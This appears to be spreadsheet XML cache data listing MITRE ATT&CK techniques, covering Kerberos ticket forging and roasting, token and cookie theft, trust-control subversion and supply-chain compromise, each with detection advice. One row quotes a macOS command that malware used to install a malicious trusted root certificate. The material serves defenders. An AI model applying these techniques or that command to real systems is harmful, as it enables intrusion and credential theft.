    <b v="1"/>
    <s v="T1218"/>
    <s v="Rodrigo Garcia, Red Canary"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1216"/>
    <x v="465"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1216"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <s v="Application control, Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1216.001"/>
    <x v="466"/>
    <s v="Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts._x000a__x000a_&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
    <s v="https://attack.mitre.org/techniques/T1216/001"/>
    <d v="2020-02-03T00:00:00"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files."/>
    <s v="Windows"/>
    <s v="Command: Command Execution, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1216"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1072"/>
    <x v="467"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1072"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="2.1"/>
    <x v="25"/>
    <s v="Detection methods will vary depending on the type of third-party software or system and how it is typically used. _x000a__x000a_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_x000a__x000a_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a__x000a_Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Shane Tully, @securitygypsy"/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1518"/>
    <x v="468"/>
    <s v="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_x000a__x000a_Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)."/>
    <s v="https://attack.mitre.org/techniques/T1518"/>
    <d v="2019-09-16T00:00:00"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="1.3"/>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Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1518.001"/>
    <x v="469"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)"/>
    <s v="https://attack.mitre.org/techniques/T1518/001"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2021-03-29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In cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment."/>
    <s v="Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1518"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608"/>
    <x v="470"/>
    <s v="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_x000a__x000a_Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):_x000a__x000a_* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)_x000a_* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)_x000a_* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)_x000a_* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)"/>
    <s v="https://attack.mitre.org/techniques/T1608"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors."/>
    <s v="PRE"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608.004"/>
    <x v="471"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)."/>
    <s v="https://attack.mitre.org/techniques/T1608/004"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1608"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608.003"/>
    <x v="472"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1608/003"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)_x000a__x000a_Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)."/>
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1608"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608.005"/>
    <x v="473"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1608/005"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1608"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608.001"/>
    <x v="474"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1608/001"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1608"/>
    <s v="Kobi Haimovich, CardinalOps"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1608.002"/>
    <x v="475"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool."/>
    <s v="https://attack.mitre.org/techniques/T1608/002"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1"/>
    <x v="4"/>
    <s v="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
    <s v="PRE"/>
    <m/>
    <b v="1"/>
    <s v="T1608"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1528"/>
    <x v="476"/>
    <s v="Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access._x000a__x000a_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_x000a_ _x000a_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_x000a__x000a_Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)"/>
    <s v="https://attack.mitre.org/techniques/T1528"/>
    <d v="2019-09-04T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="Azure AD, Google Workspace, Office 365, SaaS"/>
    <s v="User Account: User Account Modification"/>
    <b v="0"/>
    <m/>
    <s v="Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1539"/>
    <x v="477"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application."/>
    <s v="https://attack.mitre.org/techniques/T1539"/>
    <d v="2019-10-08T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory."/>
    <s v="Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="File: File Access, Process: Process Access"/>
    <b v="0"/>
    <m/>
    <s v="Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1558"/>
    <x v="478"/>
    <s v="Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). _x000a__x000a_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s v="https://attack.mitre.org/techniques/T1558"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)_x000a__x000a_Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. _x000a__x000a_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_x000a__x000a_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s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1558.004"/>
    <x v="479"/>
    <s v="Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) _x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1558/004"/>
    <d v="2020-08-24T00:00:00"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request"/>
    <b v="1"/>
    <s v="T1558"/>
    <s v="Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1558.001"/>
    <x v="480"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1558/001"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-11-05T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)_x000a__x000a_Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. _x000a_"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata"/>
    <b v="1"/>
    <s v="T1558"/>
    <s v="Itamar Mizrahi, Cymptom"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1558.003"/>
    <x v="481"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1558/003"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Credential Request"/>
    <b v="1"/>
    <s v="T1558"/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1558.002"/>
    <x v="482"/>
    <s v="Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)_x000a__x000a_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_x000a__x000a_Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003)."/>
    <s v="https://attack.mitre.org/techniques/T1558/002"/>
    <d v="2020-02-11T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) _x000a__x000a_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
    <s v="Windows"/>
    <s v="Logon Session: Logon Session Metadata"/>
    <b v="1"/>
    <s v="T1558"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1553"/>
    <x v="483"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1553"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure &quot;Hide Microsoft Entries&quot; and &quot;Hide Windows Entries&quot; are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) _x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control, Autoruns Analysis, Digital Certificate Validation, Process whitelisting, User Mode Signature Validation, Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1553.002"/>
    <x v="484"/>
    <s v="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_x000a__x000a_Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) _x000a__x000a_Code signing certificates may be used to bypass security policies that require signed code to execute on a system. "/>
    <s v="https://attack.mitre.org/techniques/T1553/002"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers."/>
    <s v="Windows, macOS"/>
    <s v="File: File Metadata"/>
    <b v="1"/>
    <s v="T1553"/>
    <m/>
    <m/>
    <s v="Windows User Account Control"/>
    <m/>
  </r>
  <r>
    <s v="T1553.006"/>
    <x v="485"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1553/006"/>
    <d v="2021-04-23T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1553"/>
    <s v="Abel Morales, Exabeam"/>
    <m/>
    <s v="Application control, Digital Certificate Validation, User Mode Signature Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1553.001"/>
    <x v="486"/>
    <s v="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_x000a__x000a_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_x000a_ _x000a_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
    <s v="https://attack.mitre.org/techniques/T1553/001"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2020-06-20T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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s v="macOS"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1553"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1553.004"/>
    <x v="487"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)"/>
    <s v="https://attack.mitre.org/techniques/T1553/004"/>
    <d v="2020-02-21T00:00:00"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25_x000a_* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85_x000a_* 3B1EFD3A66EA28B16697394703A72CA340A05BD5_x000a_* 7F88CD7223F3C813818C994614A89C99FA3B5247_x000a_* 8F43288AD272F3103B6FB1428485EA3014C0BCFE_x000a_* A43489159A520F0D93D032CCAF37E7FE20A8B419_x000a_* BE36A4562FB2EE05DBB3D32323ADF445084ED656_x000a_* CDD4EEAE6000AC7F40C3802C171E30148030C072"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1553"/>
    <s v="Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire"/>
    <m/>
    <s v="Digital Certificate Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1553.005"/>
    <x v="488"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1553/005"/>
    <d v="2021-02-22T00:00:00"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities."/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Metadata"/>
    <b v="1"/>
    <s v="T1553"/>
    <s v="Christiaan Beek, @ChristiaanBeek"/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1553.003"/>
    <x v="489"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_*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_x000a_*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_x000a_*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_x000a_* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001)._x000a__x000a_Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)"/>
    <s v="https://attack.mitre.org/techniques/T1553/003"/>
    <d v="2020-02-05T00:00:00"/>
    <d v="2021-02-09T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)_x000a__x000a_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_x000a__x000a_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_x000a__x000a_* HKLM\SOFTWARE\Microsoft\Cryptography\OID_x000a_* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID_x000a_* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust_x000a_* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust_x000a__x000a_**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)_x000a__x000a_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
    <s v="Windows"/>
    <s v="File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1553"/>
    <s v="Matt Graeber, @mattifestation, SpecterOps"/>
    <m/>
    <s v="Application control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation"/>
    <m/>
  </r>
  <r>
    <s v="T1195"/>
    <x v="490"/>
    <s v="Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise._x000a__x000a_Supply chain compromise can take place at any stage of the supply chain including:_x000a__x000a_* Manipulation of development tools_x000a_* Manipulation of a development environment_x000a_* Manipulation of source code repositories (public or private)_x000a_* Manipulation of source code in open-source dependencies_x000a_* Manipulation of software update/distribution mechanisms_x000a_* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) _x000a_* Replacement of legitimate software with modified versions_x000a_* Sales of modified/counterfeit products to legitimate distributors_x000a_* Shipment interdiction_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1195"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="1.2"/>
    <x v="15"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="0"/>
    <m/>
    <s v="Veeral Patel"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1195.003"/>
    <x v="491"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1195/003"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="1"/>
    <x v="15"/>
    <s v="Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes."/>
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="1"/>
    <s v="T1195"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1195.001"/>
    <x v="492"/>
    <s v="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_x000a__x000a_Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. "/>
    <s v="https://attack.mitre.org/techniques/T1195/001"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="1"/>
    <x v="15"/>
    <s v="Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. "/>
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="1"/>
    <s v="T1195"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1195.002"/>
    <x v="493"/>
    <s v="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_x000a__x000a_Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  "/>
    <s v="https://attack.mitre.org/techniques/T1195/002"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="1"/>
    <x v="15"/>
    <s v="Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. "/>
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="1"/>
    <s v="T1195"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1082"/>
    <x v="494"/>
    <s v="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_x000a__x000a_Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS &lt;code&gt;systemsetup&lt;/code&gt; command, but it requires administrative privileges._x000a__x000a_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 v="https://attack.mitre.org/techniques/T1082"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2.2000000000000002"/>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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations."/>
    <s v="IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Instance: Instance Metadata, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1614"/>
    <x v="495"/>
    <s v="_x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)"/>
    <s v="https://attack.mitre.org/techniques/T1614"/>
    <d v="2021-04-01T00:00:00"/>
    <d v="2021-04-20T00:00:00"/>
    <n v="1"/>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_x000a__x000a_Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo."/>
    <s v="IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Instance: Instance Metadata, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Hiroki Nagahama, NEC Corporation; Katie Nickels, Red Canary; Manikantan Srinivasan, NEC Corporation India; Pooja Natarajan, NEC Corporation India; Wes Hurd"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1016"/>
    <x v="496"/>
    <s v="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_x000a__x000a_Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions."/>
    <s v="https://attack.mitre.org/techniques/T1016"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-24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Script: Script Execution"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1016.001"/>
    <x v="497"/>
    <s v="Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), &lt;code&gt;tracert&lt;/code&gt;, and GET requests to websites._x000a__x000a_Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers."/>
    <s v="https://attack.mitre.org/techniques/T1016/001"/>
    <d v="2021-03-17T00:00:00"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="1"/>
    <x v="2"/>
    <s v="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_x000a__x000a_Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1016"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1049"/>
    <x v="498"/>
    <s v="Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. _x000a__x000a_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_x000a__x000a_Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), &quot;net use,&quot; and &quot;net session&quot; with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to &quot;net session&quot;."/>
    <s v="https://attack.mitre.org/techniques/T1049"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-03-08T00:00:00"/>
    <n v="2.200000000000000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IaaS, Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Process: OS API Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1033"/>
    <x v="499"/>
    <s v="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_x000a__x000a_Utilities and commands that acquire this information include &lt;code&gt;whoami&lt;/code&gt;. In Mac and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;."/>
    <s v="https://attack.mitre.org/techniques/T1033"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-15T00:00:00"/>
    <n v="1.2"/>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Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1007"/>
    <x v="500"/>
    <s v="Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are &quot;sc,&quot; &quot;tasklist /svc&quot; using [Tasklist](https://attack.mitre.org/software/S0057), and &quot;net start&quo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
    <s v="https://attack.mitre.org/techniques/T1007"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-15T00:00:00"/>
    <n v="1.100000000000000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s v="Command: Command Execution, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1569"/>
    <x v="501"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1569"/>
    <d v="2020-03-10T00:00:00"/>
    <d v="2020-06-08T00:00:00"/>
    <n v="1"/>
    <x v="13"/>
    <s v="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
